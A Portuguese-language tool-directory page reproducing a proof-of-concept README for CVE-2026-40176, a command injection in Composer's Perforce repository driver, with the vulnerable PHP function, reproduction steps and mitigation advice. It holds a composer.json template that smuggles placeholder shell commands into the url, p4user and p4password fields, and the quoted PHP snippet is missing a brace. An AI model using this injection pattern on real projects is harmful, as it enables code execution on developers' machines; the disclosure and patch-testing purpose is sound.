Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
cve-2026-40176-cve-2026-40261 — Prova de conceito demonstrando injeção de comandos no driver Perforce do Composer (CVE-2026-40176), permitindo execução remota de código por meio de configuração de repositório manipulada. | Kitploit
Ferramentas/GitHubGitHub/dapthehuman/cve-2026-40176-cve-2026-40261
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebComando e ControleDesenvolvimento de Payloads
GitHubdapthehuman/cve-2026-40176-cve-2026-40261

cve-2026-40176-cve-2026-40261

Prova de conceito demonstrando injeção de comandos no driver Perforce do Composer (CVE-2026-40176), permitindo execução remota de código por meio de configuração de repositório manipulada.

Ver Repositório
há 4 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2026-40176

Execução Remota de Código (RCE) no Repositório Perforce do Composer

Composer Version Severity Type


📋 Resumo

Vulnerabilidade de Injeção de Comandos no driver de repositório Perforce do Composer, permitindo Execução Remota de Código (RCE) por meio de validação insuficiente de entrada no processamento de URLs de repositórios.


🎯 Detalhes da Vulnerabilidade

PropriedadeValor
ID CVECVE-2026-40176
Versões AfetadasComposer < 2.2.27
Tipo de VulnerabilidadeInjeção de Comandos
Vetor de AtaqueConfiguração maliciosa de repositório
ImpactoExecução arbitrária de código
Pontuação CVSSAlta/Crítica

🔍 Descrição Técnica

A vulnerabilidade existe na forma como o Composer processa quando o tipo é perforce. O parâmetro não é devidamente sanitizado antes de ser passado para comandos shell, permitindo que atacantes injetem comandos arbitrários no sistema.

root@kitploit:~

    public function generateP4Command($command, $useClient = true)
    {
        $p4Command = 'p4 ';
        $p4Command .= '-u ' . $this->getUser() . ' ';
        if ($useClient) 
            $p4Command .= '-c ' . $this->getClient() . ' ';
        }
        $p4Command .= '-p ' . $this->getPort() . ' ' . $command;

        return $p4Command;
    }

Nada disso foi escapado corretamente, permitindo que um atacante injete comandos ao criar um payload malicioso para todos os campos com o tipo perforce.

Padrão de Código Vulnerável:

root@kitploit:~
{
  "repositories": [
    {
      "type": "perforce",
      "url": "PERFORCE_URL; INJECTED_COMMAND #",
      "depot": "depot",
      "p4user": "user; INJECRTED_COMMAND #",
      "p4password": "password; INJECTED_COMMAND #",
    }
  ]
}

🚀 Prova de Conceito

Este repositório contém uma prova de conceito funcional que demonstra a vulnerabilidade.

Estrutura do Projeto

root@kitploit:~
CVE-2026-40176/
├── composer.json              # Configuração maliciosa do repositório Perforce
├── vuln-composer.phar         # Composer 2.2.26 (VULNERÁVEL)
├── patched-composer.phar      # Composer 2.2.27 (CORRIGIDO)
└── README.md                  # Este arquivo

Etapas de Reprodução

1. Clonar o repositório

root@kitploit:~
git clone <repository-url>
cd CVE-2026-40176

2. Verificar as versões do Composer

root@kitploit:~
php vuln-composer.phar --version
# Saída: Composer version 2.2.26

php patched-composer.phar --version
# Saída: Composer version 2.2.27

3. Testar a versão vulnerável

root@kitploit:~
php vuln-composer.phar install
# OU
php vuln-composer.phar update

4. Verificar a exploração

root@kitploit:~
ls -la /tmp/pwned

5. Testar a versão corrigida (deve falhar)

root@kitploit:~
rm -f /tmp/pwned
php patched-composer.phar update
ls -la /tmp/pwned
# O arquivo NÃO deve existir (a vulnerabilidade foi corrigida)

🛡️ Mitigação

Ações Imediatas

  1. Atualize o Composer para a versão 2.2.27 ou posterior:

    root@kitploit:~
    composer self-update --2.2.27
    # OU
    wget https://getcomposer.org/download/2.2.27/composer.phar
    
  2. Revise todos os arquivos composer.json em busca de configurações de repositório desconhecidas ou suspeitas

  3. Audite a cadeia de suprimentos - Verifique se alguma dependência referencia repositórios não confiáveis

Detecção

root@kitploit:~
# Verifique sua versão do Composer
composer --version

# Procure por repositórios Perforce em seus projetos
grep -r "perforce" */composer.json
Baixar ferramenta